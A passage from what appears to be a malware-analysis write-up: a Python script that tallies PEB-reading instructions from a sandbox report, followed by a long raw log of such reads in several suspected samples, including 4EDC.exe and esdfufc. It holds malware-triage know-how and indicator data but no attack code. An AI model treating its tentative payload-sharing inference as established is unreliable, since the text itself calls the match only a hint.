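Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0095F0 mov ecx, dword ptr fs:[00000030h] 22_2_6C0095F0
"""


class PebRead(NamedTuple):
    process: str  # image name, e.g. "4EDC.exe"
    address: int  # start of the containing function, as the report prints it
    instr: str    # the PEB-reading instruction


def parse_peb_reads(report: str) -> List[PebRead]:
    reads = []
    for line in report.splitlines():
        m = PEB_RE.match(line.strip())
        if not m:
            continue
        addr = int(m.group("id").rsplit("_", 1)[-1], 16)
        reads.append(PebRead(m.group("proc").rsplit("\\", 1)[-1], addr, m.group("instr")))
    return reads


def reads_per_function(reads: List[PebRead]) -> List[Tuple[str, int, int]]:
    """(process, function address, number of PEB reads), busiest first."""
    counts = Counter((r.process, r.address) for r in reads)
    return sorted(((p, a, n) for (p, a), n in counts.items()),
                  key=lambda t: (-t[2], t[0], t[1]))


def shared_stubs(reads: List[PebRead]) -> Dict[Tuple[int, str], Set[str]]:
    """Group by (page offset, instruction); keep groups seen in more than one
    process, i.e. the same code apparently mapped at different base addresses."""
    groups: Dict[Tuple[int, str], Set[str]] = defaultdict(set)
    for r in reads:
        groups[(r.address & 0xFFF, r.instr)].add(r.process)
    return {k: v for k, v in groups.items() if len(v) > 1}


if __name__ == "__main__":
    reads = parse_peb_reads(SAMPLE_REPORT)
    for proc, addr, n in reads_per_function(reads):
        print(f"{proc:16} {addr:#010x} {n:3} PEB reads")
    for (off, instr), procs in shared_stubs(reads).items():
        print(f"page offset {off:#05x} '{instr}' shared by {sorted(procs)}")
```

The page-offset match is a hint, not proof; it is the cue to dump the three regions and diff them, after which an identical stub confirms that esdfufc and 8908.exe carry the same payload as the original sample.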
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_04760042 push dword ptr fs:[00000030h] 0_2_04760042
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 12_2_02CB0042 push dword ptr fs:[00000030h] 12_2_02CB0042
Source: C:\Users\user\AppData\Local\Temp\8908.exe Code function: 13_2_02B60042 push dword ptr fs:[00000030h] 13_2_02B60042
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D740D mov eax, dword ptr fs:[00000030h] 22_2_6C0D740D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D740D mov eax, dword ptr fs:[00000030h] 22_2_6C0D740D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D740D mov eax, dword ptr fs:[00000030h] 22_2_6C0D740D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01FC01 mov eax, dword ptr fs:[00000030h] 22_2_6C01FC01
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01FC01 mov eax, dword ptr fs:[00000030h] 22_2_6C01FC01
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01FC01 mov eax, dword ptr fs:[00000030h] 22_2_6C01FC01
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01FC01 mov eax, dword ptr fs:[00000030h] 22_2_6C01FC01
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1C06 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1C06
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8C14 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8C14
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03BC2C mov eax, dword ptr fs:[00000030h] 22_2_6C03BC2C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C022430 mov eax, dword ptr fs:[00000030h] 22_2_6C022430
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C022430 mov eax, dword ptr fs:[00000030h] 22_2_6C022430
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004439 mov eax, dword ptr fs:[00000030h] 22_2_6C004439
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8450 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8450
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02746D mov eax, dword ptr fs:[00000030h] 22_2_6C02746D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C045C70 mov eax, dword ptr fs:[00000030h] 22_2_6C045C70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01FC77 mov eax, dword ptr fs:[00000030h] 22_2_6C01FC77
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01FC77 mov eax, dword ptr fs:[00000030h] 22_2_6C01FC77
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01FC77 mov eax, dword ptr fs:[00000030h] 22_2_6C01FC77
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01FC77 mov eax, dword ptr fs:[00000030h] 22_2_6C01FC77
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03AC7B mov eax, dword ptr fs:[00000030h] 22_2_6C03AC7B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8C75 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8C75
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C001480 mov eax, dword ptr fs:[00000030h] 22_2_6C001480
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4496 mov eax, dword ptr fs:[00000030h] 22_2_6C0C4496
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00649B mov eax, dword ptr fs:[00000030h] 22_2_6C00649B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00649B mov eax, dword ptr fs:[00000030h] 22_2_6C00649B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00EC9B mov eax, dword ptr fs:[00000030h] 22_2_6C00EC9B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00EC9B mov eax, dword ptr fs:[00000030h] 22_2_6C00EC9B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004CB0 mov eax, dword ptr fs:[00000030h] 22_2_6C004CB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03D4B0 mov eax, dword ptr fs:[00000030h] 22_2_6C03D4B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D9CB3 mov eax, dword ptr fs:[00000030h] 22_2_6C0D9CB3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CCC0 mov eax, dword ptr fs:[00000030h] 22_2_6C03CCC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CCC0 mov eax, dword ptr fs:[00000030h] 22_2_6C03CCC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CCC0 mov eax, dword ptr fs:[00000030h] 22_2_6C03CCC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CCC0 mov eax, dword ptr fs:[00000030h] 22_2_6C03CCC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002CDB mov eax, dword ptr fs:[00000030h] 22_2_6C002CDB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8CD6 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8CD6
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BD4E1 mov eax, dword ptr fs:[00000030h] 22_2_6C0BD4E1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C14FB mov eax, dword ptr fs:[00000030h] 22_2_6C0C14FB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C3518 mov eax, dword ptr fs:[00000030h] 22_2_6C0C3518
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C3518 mov eax, dword ptr fs:[00000030h] 22_2_6C0C3518
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C3518 mov eax, dword ptr fs:[00000030h] 22_2_6C0C3518
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F51D mov eax, dword ptr fs:[00000030h] 22_2_6C00F51D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031520 mov eax, dword ptr fs:[00000030h] 22_2_6C031520
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031520 mov eax, dword ptr fs:[00000030h] 22_2_6C031520
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031520 mov eax, dword ptr fs:[00000030h] 22_2_6C031520
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031520 mov eax, dword ptr fs:[00000030h] 22_2_6C031520
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031520 mov eax, dword ptr fs:[00000030h] 22_2_6C031520
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00AD30 mov eax, dword ptr fs:[00000030h] 22_2_6C00AD30
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034D3B mov eax, dword ptr fs:[00000030h] 22_2_6C034D3B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034D3B mov eax, dword ptr fs:[00000030h] 22_2_6C034D3B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034D3B mov eax, dword ptr fs:[00000030h] 22_2_6C034D3B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8D34 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8D34
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C043D43 mov eax, dword ptr fs:[00000030h] 22_2_6C043D43
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B3D40 mov eax, dword ptr fs:[00000030h] 22_2_6C0B3D40
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00354C mov eax, dword ptr fs:[00000030h] 22_2_6C00354C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00354C mov eax, dword ptr fs:[00000030h] 22_2_6C00354C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B8D47 mov eax, dword ptr fs:[00000030h] 22_2_6C0B8D47
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C027D50 mov eax, dword ptr fs:[00000030h] 22_2_6C027D50
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02C577 mov eax, dword ptr fs:[00000030h] 22_2_6C02C577
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02C577 mov eax, dword ptr fs:[00000030h] 22_2_6C02C577
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CB581 mov eax, dword ptr fs:[00000030h] 22_2_6C0CB581
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CB581 mov eax, dword ptr fs:[00000030h] 22_2_6C0CB581
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CB581 mov eax, dword ptr fs:[00000030h] 22_2_6C0CB581
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CB581 mov eax, dword ptr fs:[00000030h] 22_2_6C0CB581
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003591 mov eax, dword ptr fs:[00000030h] 22_2_6C003591
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0335A1 mov eax, dword ptr fs:[00000030h] 22_2_6C0335A1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031DB5 mov eax, dword ptr fs:[00000030h] 22_2_6C031DB5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031DB5 mov eax, dword ptr fs:[00000030h] 22_2_6C031DB5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C031DB5 mov eax, dword ptr fs:[00000030h] 22_2_6C031DB5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0015C1 mov eax, dword ptr fs:[00000030h] 22_2_6C0015C1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BFDD3 mov eax, dword ptr fs:[00000030h] 22_2_6C0BFDD3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0395EC mov eax, dword ptr fs:[00000030h] 22_2_6C0395EC
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0095F0 mov eax, dword ptr fs:[00000030h] 22_2_6C0095F0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0095F0 mov ecx, dword ptr fs:[00000030h] 22_2_6C0095F0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B8DF1 mov eax, dword ptr fs:[00000030h] 22_2_6C0B8DF1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00C600 mov eax, dword ptr fs:[00000030h] 22_2_6C00C600
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00C600 mov eax, dword ptr fs:[00000030h] 22_2_6C00C600
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00C600 mov eax, dword ptr fs:[00000030h] 22_2_6C00C600
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C092E14 mov eax, dword ptr fs:[00000030h] 22_2_6C092E14
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C040E21 mov eax, dword ptr fs:[00000030h] 22_2_6C040E21
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C085623 mov eax, dword ptr fs:[00000030h] 22_2_6C085623
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BFE3F mov eax, dword ptr fs:[00000030h] 22_2_6C0BFE3F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00A63B mov eax, dword ptr fs:[00000030h] 22_2_6C00A63B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00A63B mov eax, dword ptr fs:[00000030h] 22_2_6C00A63B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03C63D mov eax, dword ptr fs:[00000030h] 22_2_6C03C63D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C096652 mov eax, dword ptr fs:[00000030h] 22_2_6C096652
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C08AE60 mov eax, dword ptr fs:[00000030h] 22_2_6C08AE60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C08AE60 mov eax, dword ptr fs:[00000030h] 22_2_6C08AE60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C08AE60 mov eax, dword ptr fs:[00000030h] 22_2_6C08AE60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C08AE60 mov eax, dword ptr fs:[00000030h] 22_2_6C08AE60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01766D mov eax, dword ptr fs:[00000030h] 22_2_6C01766D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CE6C mov eax, dword ptr fs:[00000030h] 22_2_6C03CE6C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CE6C mov ecx, dword ptr fs:[00000030h] 22_2_6C03CE6C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C033E70 mov eax, dword ptr fs:[00000030h] 22_2_6C033E70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BF674 mov eax, dword ptr fs:[00000030h] 22_2_6C0BF674
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003E80 mov eax, dword ptr fs:[00000030h] 22_2_6C003E80
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003E80 mov eax, dword ptr fs:[00000030h] 22_2_6C003E80
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DE9E mov eax, dword ptr fs:[00000030h] 22_2_6C03DE9E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DE9E mov eax, dword ptr fs:[00000030h] 22_2_6C03DE9E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DE9E mov eax, dword ptr fs:[00000030h] 22_2_6C03DE9E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C092EA3 mov eax, dword ptr fs:[00000030h] 22_2_6C092EA3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0846A7 mov eax, dword ptr fs:[00000030h] 22_2_6C0846A7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0336CC mov eax, dword ptr fs:[00000030h] 22_2_6C0336CC
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8ED6 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8ED6
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C043EE4 mov eax, dword ptr fs:[00000030h] 22_2_6C043EE4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C043EE4 mov eax, dword ptr fs:[00000030h] 22_2_6C043EE4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C043EE4 mov eax, dword ptr fs:[00000030h] 22_2_6C043EE4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0316E0 mov ecx, dword ptr fs:[00000030h] 22_2_6C0316E0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0176E2 mov eax, dword ptr fs:[00000030h] 22_2_6C0176E2
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03C707 mov eax, dword ptr fs:[00000030h] 22_2_6C03C707
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03C707 mov ecx, dword ptr fs:[00000030h] 22_2_6C03C707
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03C707 mov eax, dword ptr fs:[00000030h] 22_2_6C03C707
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034710 mov eax, dword ptr fs:[00000030h] 22_2_6C034710
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02F716 mov eax, dword ptr fs:[00000030h] 22_2_6C02F716
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BDF1D mov ecx, dword ptr fs:[00000030h] 22_2_6C0BDF1D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BDF1D mov eax, dword ptr fs:[00000030h] 22_2_6C0BDF1D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C09FF10 mov eax, dword ptr fs:[00000030h] 22_2_6C09FF10
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C09FF10 mov eax, dword ptr fs:[00000030h] 22_2_6C09FF10
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004F2E mov eax, dword ptr fs:[00000030h] 22_2_6C004F2E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004F2E mov eax, dword ptr fs:[00000030h] 22_2_6C004F2E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006730 mov eax, dword ptr fs:[00000030h] 22_2_6C006730
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006730 mov eax, dword ptr fs:[00000030h] 22_2_6C006730
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006730 mov eax, dword ptr fs:[00000030h] 22_2_6C006730
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03E730 mov eax, dword ptr fs:[00000030h] 22_2_6C03E730
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02B73D mov eax, dword ptr fs:[00000030h] 22_2_6C02B73D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02B73D mov eax, dword ptr fs:[00000030h] 22_2_6C02B73D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00A745 mov eax, dword ptr fs:[00000030h] 22_2_6C00A745
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DF4C mov eax, dword ptr fs:[00000030h] 22_2_6C03DF4C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C095F5F mov eax, dword ptr fs:[00000030h] 22_2_6C095F5F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C095F5F mov eax, dword ptr fs:[00000030h] 22_2_6C095F5F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C095F5F mov eax, dword ptr fs:[00000030h] 22_2_6C095F5F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C095F5F mov eax, dword ptr fs:[00000030h] 22_2_6C095F5F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C095F5F mov eax, dword ptr fs:[00000030h] 22_2_6C095F5F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006F60 mov eax, dword ptr fs:[00000030h] 22_2_6C006F60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006F60 mov eax, dword ptr fs:[00000030h] 22_2_6C006F60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02E760 mov eax, dword ptr fs:[00000030h] 22_2_6C02E760
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02E760 mov eax, dword ptr fs:[00000030h] 22_2_6C02E760
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8F6A mov eax, dword ptr fs:[00000030h] 22_2_6C0D8F6A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CF6A mov eax, dword ptr fs:[00000030h] 22_2_6C03CF6A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03CF6A mov eax, dword ptr fs:[00000030h] 22_2_6C03CF6A
